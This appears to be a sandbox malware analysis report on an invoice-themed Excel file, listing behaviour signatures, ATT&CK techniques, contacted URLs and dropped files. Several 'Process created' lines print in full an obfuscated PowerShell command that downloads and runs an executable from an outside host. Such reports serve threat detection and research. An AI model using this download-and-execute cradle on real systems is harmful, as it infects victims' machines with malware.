    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2777Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7165Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep count: 2777 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep count: 7165 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell download and execute
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3636, type: MEMORYSTR
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nol -nonint -windows 1 -noprofile -execu bypass $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';invoke-expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nol -nonint -windows 1 -noprofile -execu bypass $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';invoke-expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)Jump to behavior

    Language, Device and Operating System Detection

    barindex
    Yara detected Obfuscated Powershell
    Source: Yara matchFile source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information22
    Scripting    		Valid Accounts111
    Command and Scripting Interpreter    		22
    Scripting    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Process Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts11
    Exploitation for Client Execution    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		LSASS Memory21
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Application Window Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Install Root Certificate    		Cached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    fattura_062 (1).xls87%ReversingLabsDocument-Excel.Trojan.Chronos
    fattura_062 (1).xls100%AviraX97M/Agent.85632241
    fattura_062 (1).xls100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://crl.entrust.net/server1.crl00%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://secure.comodo.com/CPS00%URL Reputationsafe
    http://go.micros0%URL Reputationsafe
    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    futanostra.win
    		unknown
    		unknowntrue
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        https://futanostra.winpowershell.exe, 00000004.00000002.408115766.0000000002572000.00000004.00000800.00020000.00000000.sdmptrue
          		unknown
          http://crl.entrust.net/server1.crl0powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://ocsp.entrust.net03powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://futanostra.win/foglio.fulpowershell.exe, 00000004.00000002.408115766.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408045417.0000000000444000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmp, fattura_062 (1).xls, fattura_062 (1).xls.0.dr, 58230000.0.drtrue
              		unknown
              http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://futanostra.wifattura_062 (1).xlstrue
                		unknown
                http://ocsp.entrust.net0Dpowershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.408115766.0000000002371000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://secure.comodo.com/CPS0powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://go.microspowershell.exe, 00000004.00000002.408115766.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crl.entrust.net/2048ca.crl0powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://futanostra.win/foglio.fupowershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmptrue
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious

                  Private

                  IP
                  192.168.2.255

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1546100
                  Start date and time:2024-10-31 14:08:13 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 35s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:fattura_062 (1).xls
                  Detection:MAL
                  Classification:mal100.expl.evad.winXLS@5/12@1/1
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 2
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .xls
                  • Changed system and user locale, location and keyboard layout to Italian - Italy
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                  • Execution Graph export aborted for target powershell.exe, PID 3636 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: fattura_062 (1).xls

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  09:09:24API Interceptor20x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4742
                  Entropy (8bit):4.8105940880640246
                  Encrypted:false
                  SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                  MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                  SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                  SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                  SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................

                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):147284
                  Entropy (8bit):4.421713522050353
                  Encrypted:false
                  SSDEEP:1536:C8yL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CVJNSc83tKBAvQVCgOtmXmLpLmB
                  MD5:04CD6AD8D742796C999E0B642C215E20
                  SHA1:6F2EBE8A7C2178EB47EF4E17B2DEA0247FA016B5
                  SHA-256:BBDAFCDD334DC4C516635C3723C5F90188FBE00580191185A619FE1CACD5813F
                  SHA-512:1EA0FFB8193F0C1ADA96E74E4941D86183DC5F446494104B3E0B56F5DBB20848EA6085E3167081205808A1586146C0ABBD92B8925FAE02EA1E0F77BCDE8E1D87
                  Malicious:false
                  Reputation:low
                  Preview:MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................

                  C:\Users\user\AppData\Local\Temp\a0uakkwj.mav.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\we0q1c3n.dql.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\~DF46E6AAF31F73CBB2.TMP

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF8E390AA12C78A9CD.TMP

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BB7DF04E1B0A2570657527A7E108AE23
                  SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                  SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                  SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFEDED12047109702F.TMP

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):28672
                  Entropy (8bit):3.0596404003159368
                  Encrypted:false
                  SSDEEP:768:vvxEtjPOtioVjDGUU1qfDlaGGx+cL2QniRa:HxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnl
                  MD5:91BF70D9F7CE4AAD69F3EBC3ABBC54AC
                  SHA1:AE96904177AB6D73D7F0F433F637176EF4881EB5
                  SHA-256:3E4285F9E502FA2AF66CA99E8E8A5D312111E7B9B0514752C5C49C2151BD1A51
                  SHA-512:F5AED1CDF74DF64444877822995CF7FB873CB93715B5B8E3151FCE24A999CF1B6251165FBA98DA5CD309F31EA369CAC1549883324551610E392933C7E5C14DCB
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\Desktop\33EB9B09.tmp (copy)

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Wed Aug 9 12:45:36 2017, Security: 0
                  Category:dropped
                  Size (bytes):68608
                  Entropy (8bit):5.499773763083208
                  Encrypted:false
                  SSDEEP:1536:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnf9SwwLXoWdPm9QjCld:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnz
                  MD5:692F9695E34385CB89ED73F2D732D90B
                  SHA1:021F37AF47F91A1DAD221018CD2BFE725D889E37
                  SHA-256:F3FED05504B1A32AE9FAB6C7EE9BDA57E16A232DD4D864D5250706535E037AAD
                  SHA-512:4E98ECD733E50154E66986CB93F9E7DDC3939068F031B4E187EF910D5BDD0CBEE9D870990D615E121B9822BFD80A669ACDEAE06571A4D9501942F512BB6ADD8E
                  Malicious:false
                  Preview:......................>...................................W.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................V....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U.......n...z...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h.......j...k...l...m...o...}...p...q...r...s...t...u...v...w...x...y...{...

                  C:\Users\user\Desktop\58230000

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Last Saved By: user, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Thu Oct 31 13:09:47 2024, Security: 0
                  Category:dropped
                  Size (bytes):116224
                  Entropy (8bit):5.152283777724364
                  Encrypted:false
                  SSDEEP:3072:4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnGUJ7Jt0rbXF5wUPJ4tUpzg:4xEtjPOtioVjDGUU1qfDlavx+W2QnGUK
                  MD5:19DD2E746F646CDC5738A912FD88A38D
                  SHA1:AC95E43F63DE5DD369BF1C355C8C3132876475EF
                  SHA-256:13C38EEBE105FE6063CA22390B4457DF1CEBE2DA6F91655612860091662052B2
                  SHA-512:D7B8A19D62C42C87F97E93C2928C7A5069677D5DBC95E094D15BF8DAED82E4F44F2A0411ED12629DBE6EF85C10C6A083725AF808F471E3EFBCF96264D313A5F8
                  Malicious:false
